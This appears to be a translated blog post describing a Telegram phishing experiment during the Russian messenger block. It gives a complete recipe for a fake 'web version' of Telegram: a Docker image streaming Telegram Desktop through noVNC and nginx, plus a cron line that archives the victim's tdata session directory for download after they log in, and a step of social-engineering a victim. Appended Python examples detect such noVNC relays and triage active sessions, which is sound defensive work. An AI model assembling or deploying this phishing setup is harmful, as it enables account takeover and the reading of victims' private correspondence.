
Hijacking Telegram on Panic Waves

Today, the situation around the joint decision of the Federal Security Service of the Russian Federation and Roskomnadzor to block the Telegram messenger is very ambiguous. The decision is reckless for a number of reasons, and it creates more problems than it solves in combating the threat of terrorism.

For a mature business that had already accounted for the risks of government decisions, this created only some inconvenience, since it had to fall back on workarounds through a VPN. But for ordinary users who were not prepared for this turn of events, it brought new threats. In a panic, users began searching for and using the first free VPNs they could find, without considering that this could turn into a trap for them in the form of DNS spoofing and other MITM attacks.

Telegram has the largest audience, a fact the IT business could not ignore. Companies, in turn, have invested huge capital in developing business tools on top of this messenger's API. Even a number of government projects put money into developing technical-support bots; a vivid example is the state services portal (EPGU).

The hype wave provoked a dispute with colleagues about how vulnerable panicked users are, and we decided to conduct a Telegram phishing experiment.

Many users ran into problems accessing the web version of the messenger, and we decided to exploit exactly that. Our goal was to obtain the tdata profile, which stores those same notorious encryption keys and session data.

Our recipe consists of the following main components:


The plan: build a Docker image in which an X server and Telegram Desktop start, and noVNC relays the running Telegram through nginx to the client's web browser.

Step 1: Restrict the VNC session so that, instead of a full desktop environment, it runs only Telegram and streams it through the VNC server.

To do this, create a .vnc/xstartup file with the following contents:

#!/bin/sh

# With VNCAPP unset, start an ordinary desktop session; with VNCAPP set,
# start only that one application and tear the display down when it exits.
if [ -z "$VNCAPP" ]
then
    # Uncomment the following two lines for normal desktop:
    # unset SESSION_MANAGER
    # exec /etc/X11/xinit/xinitrc

    [ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup
    [ -r "$HOME/.Xresources" ] && xrdb "$HOME/.Xresources"
    xsetroot -solid grey
    vncconfig -iconic &
    x-terminal-emulator -geometry 80x24+10+10 -ls -title "$VNCDESKTOP Desktop" &
    x-window-manager &
else
    # Single-application mode: black background, window manager, then the app itself
    xsetroot -solid black
    vncconfig -iconic &
    x-window-manager &
    $VNCAPP
    sleep 10
    # Kill the VNC display once the application has exited
    vncserver -kill "$DISPLAY"
fi

Step 2: Proxy the noVNC stream to port 80 using nginx.

Create a default site configuration file to add to the image later.

upstream vnc_proxy {
    server 127.0.0.1:6080;
}

server {
    listen 80 default_server;
    listen [::]:80 default_server;

    location / {
        add_header Access-Control-Allow-Origin *;
        proxy_pass http://127.0.0.1:6080;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_redirect default;
        client_max_body_size 10m;
        client_body_buffer_size 128k;
        proxy_connect_timeout 90;
        proxy_send_timeout 90;
        proxy_read_timeout 90;
        proxy_buffer_size 4k;
        proxy_buffers 4 32k;
        proxy_busy_buffers_size 64k;
        proxy_temp_file_write_size 64k;
    }

    location /websockify {
        proxy_http_version 1.1;
        proxy_pass http://vnc_proxy/;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection "upgrade";
        # VNC connection timeout
        proxy_read_timeout 61s;
        # Disable cache
        proxy_buffering off;
    }
}

Step 3: Since we built an experimental model and not a full Telegram phishing service, to extract the data we decided to have cron copy an archive of the tdata directory into one of the directories served by the web server.

Create a cron file with the following contents:

* * * * * root tar -czf /root/tests/data.tar.gz /root/.local/share/TelegramDesktop

Step 4: VNC:

This step requires customizing noVNC: we cut out its toolbars and hard-coded an automatic connection to the VNC server with the password matching .vnc/passwd. That password can be generated with the vncpasswd utility.

Step 5: Build the Docker image:

Everything we prepared in advance, including the Telegram binary, goes into one directory; we create a Dockerfile there and start the build.

# Version: 0.0.1
FROM vcatechnology/linux-mint
MAINTAINER Poul Lysunenko <mpoul@hungosh.net>

RUN apt update
RUN apt install -y net-tools language-pack-ru cinnamon nginx chromium-browser vnc4server xvnc4viewer xfonts-base
RUN locale-gen ru_RU.UTF-8 && dpkg-reconfigure locales

# Prepared pieces: the customized noVNC, the xstartup/passwd files, the nginx site, the Telegram binary and the cron job
COPY noVNC/ /root/
COPY .vnc/ /root/.vnc
COPY default /etc/nginx/sites-available/
COPY Telegram /root/
COPY cron /etc/cron.d/sample
RUN apt install -y cron

EXPOSE 6080

# Start nginx and cron, launch the VNC server running only Telegram, then start noVNC's websockify on top of it
ENTRYPOINT /usr/sbin/service nginx start && /usr/sbin/service cron start && VNCAPP=/root/Telegram vnc4server -depth 24 -geometry 800x600 && /root/utils/launch.sh --vnc localhost:5901

Step 6: After building and launching the image, we apply all our social-engineering knowledge and skills to invite the experiment's victim to try an "alternative" to the web version of Telegram.

One minute after the victim authorizes, download the profile from /tests/data.tar.gz.
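The defender-side counterpart to Steps 1 through 6: the "alternative web version" is really a noVNC client streaming a remote Telegram Desktop, so the victim's browser fetches noVNC assets and opens a WebSocket upgrade to /websockify, which Telegram's own web client at web.telegram.org has no reason to do. The Python below is an added example and not code from the original post: it runs that check over constructed forward-proxy log lines, groups the indicators per host, and reports hosts that are not on an assumed allowlist of places where browser-based remote desktop is expected. The log format, hostnames and allowlist are all constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample of forward-proxy log lines (not from the original post).
# Fields: timestamp client host method path status upgrade-header
SAMPLE_LOG = """\
2018-04-20T10:00:01 10.0.0.5 web.telegram.org GET / 200 -
2018-04-20T10:00:02 10.0.0.5 web.telegram.org GET /js/app.js 200 -
2018-04-20T10:05:10 10.0.0.7 tg-web-mirror.example GET / 200 -
2018-04-20T10:05:10 10.0.0.7 tg-web-mirror.example GET /core/rfb.js 200 -
2018-04-20T10:05:11 10.0.0.7 tg-web-mirror.example GET /websockify 101 websocket
2018-04-20T10:06:00 10.0.0.9 rdp.corp.example GET /vnc.html 200 -
2018-04-20T10:06:01 10.0.0.9 rdp.corp.example GET /websockify 101 websocket
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\d{3}) (\S+)$")

# Static files the noVNC client loads, and the websockify endpoint it connects to.
NOVNC_ASSET_RE = re.compile(r"/(vnc(?:_lite)?\.html|core/rfb\.js|app/ui\.js)$")
WEBSOCKIFY_RE = re.compile(r"/websockify$")

# Assumed allowlist: hosts where remote desktop in a browser is legitimate.
APPROVED_REMOTE_DESKTOP_HOSTS = frozenset({"rdp.corp.example"})


def parse_line(line):
    """Split one constructed log line into a record, or return None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, client, host, method, path, status, upgrade = m.groups()
    return {"ts": ts, "client": client, "host": host, "method": method,
            "path": path, "status": int(status), "upgrade": upgrade.lower()}


def find_remote_desktop_hosts(log_text, approved=APPROVED_REMOTE_DESKTOP_HOSTS):
    """Collect noVNC indicators per host; returns one dict per host that shows any indicator."""
    evidence = defaultdict(lambda: {"clients": set(), "assets": set(), "websocket": False})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        e = evidence[rec["host"]]
        if NOVNC_ASSET_RE.search(rec["path"]):
            e["assets"].add(rec["path"])
            e["clients"].add(rec["client"])
        # A completed WebSocket handshake (101) on /websockify is the strongest signal
        if WEBSOCKIFY_RE.search(rec["path"]) and rec["upgrade"] == "websocket" and rec["status"] == 101:
            e["websocket"] = True
            e["clients"].add(rec["client"])
    results = []
    for host, e in sorted(evidence.items()):
        if not e["assets"] and not e["websocket"]:
            continue
        results.append({"host": host, "clients": sorted(e["clients"]),
                        "assets": sorted(e["assets"]), "websocket": e["websocket"],
                        "approved": host in approved})
    return results


def alerts(log_text, approved=APPROVED_REMOTE_DESKTOP_HOSTS):
    """Only the hosts that stream a remote desktop to browsers without being allowlisted."""
    return [r for r in find_remote_desktop_hosts(log_text, approved) if not r["approved"]]


if __name__ == "__main__":
    for a in alerts(SAMPLE_LOG):
        print("remote desktop in browser from unapproved host %s: clients=%s assets=%s websocket=%s"
              % (a["host"], a["clients"], a["assets"], a["websocket"]))
```

The allowlist matters: noVNC and websockify are legitimate tools (the post itself uses an unmodified websockify), so the alert is "a browser is driving a remote desktop at a host nobody approved", not "noVNC was seen". For a messenger impersonation specifically, the combination of a page that presents itself as Telegram Web with a WebSocket to /websockify is the point to chase.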

Findings:

As you understand, I won the argument with my colleagues, but this win did not bring any joy. The state of affairs in information security shows negative trends tied to the abrupt changes in Internet-use policy in Russia. This hastily conducted research showed that even people savvy in information technology can step on the rakes set by intruders.

PS: Do not forget to check the open sessions of your messengers; maybe someone is reading your correspondence right now.
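The PS is the one mitigation the post offers, so here is what that check looks like when done systematically. The Python below is an added example, not code from the original post: it takes a list shaped like the entries in Telegram's "Active sessions" screen (constructed sample data, not real sessions) and flags every non-current session that is active from a country the owner does not use, runs on a platform the owner does not have, or has been idle for a long time. The home-country and own-platform sets and the fixed clock are assumptions of the example.

```python
from datetime import datetime, timedelta

# Constructed sample shaped like Telegram's "Active sessions" list (not data from the
# original post). "current" marks the device the review is being done from.
SAMPLE_SESSIONS = [
    {"device": "iPhone", "app": "Telegram iOS", "platform": "iOS",
     "ip": "198.51.100.10", "country": "Russia",
     "last_active": "2018-04-20T11:55:00", "current": True},
    {"device": "ThinkPad", "app": "Telegram Desktop", "platform": "Windows",
     "ip": "198.51.100.10", "country": "Russia",
     "last_active": "2018-04-19T20:10:00", "current": False},
    # A Linux desktop session the owner never created on a device of their own:
    # this is what the session authorized inside a fake "web version" looks like.
    {"device": "PC", "app": "Telegram Desktop", "platform": "Linux",
     "ip": "203.0.113.77", "country": "Netherlands",
     "last_active": "2018-04-20T11:50:00", "current": False},
    {"device": "Nexus 5", "app": "Telegram Android", "platform": "Android",
     "ip": "192.0.2.30", "country": "Russia",
     "last_active": "2017-09-01T08:00:00", "current": False},
]

NOW = datetime(2018, 4, 20, 12, 0, 0)  # fixed clock so the review is reproducible


def triage_sessions(sessions, now, home_countries, own_platforms,
                    stale_after=timedelta(days=90)):
    """Return [(session, reasons)] for every non-current session that deserves review."""
    findings = []
    for s in sessions:
        if s["current"]:
            continue  # the device you are reviewing from is trusted by definition
        reasons = []
        last_active = datetime.fromisoformat(s["last_active"])
        if s["country"] not in home_countries:
            reasons.append("active from a country you do not use: " + s["country"])
        if s["platform"] not in own_platforms:
            reasons.append("platform you do not own: " + s["platform"])
        idle = now - last_active
        if idle > stale_after:
            reasons.append("idle for %d days" % idle.days)
        if reasons:
            findings.append((s, reasons))
    return findings


def review(sessions=SAMPLE_SESSIONS, now=NOW,
           home_countries=frozenset({"Russia"}),
           own_platforms=frozenset({"iOS", "Windows", "Android"})):
    """Run the triage over the sample with the example's assumed home countries and platforms."""
    return triage_sessions(sessions, now, home_countries, own_platforms)


if __name__ == "__main__":
    for session, reasons in review():
        print("%s (%s, %s): %s" % (session["device"], session["app"],
                                   session["ip"], "; ".join(reasons)))
```

The session a victim authorized inside a fake "web version" is the same authorization that a copied tdata reuses, so terminating that session from a trusted device is what actually cuts off anyone holding the copy; changing nothing and merely closing the browser tab does not.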

Source: https://habr.com/ru/post/353948/
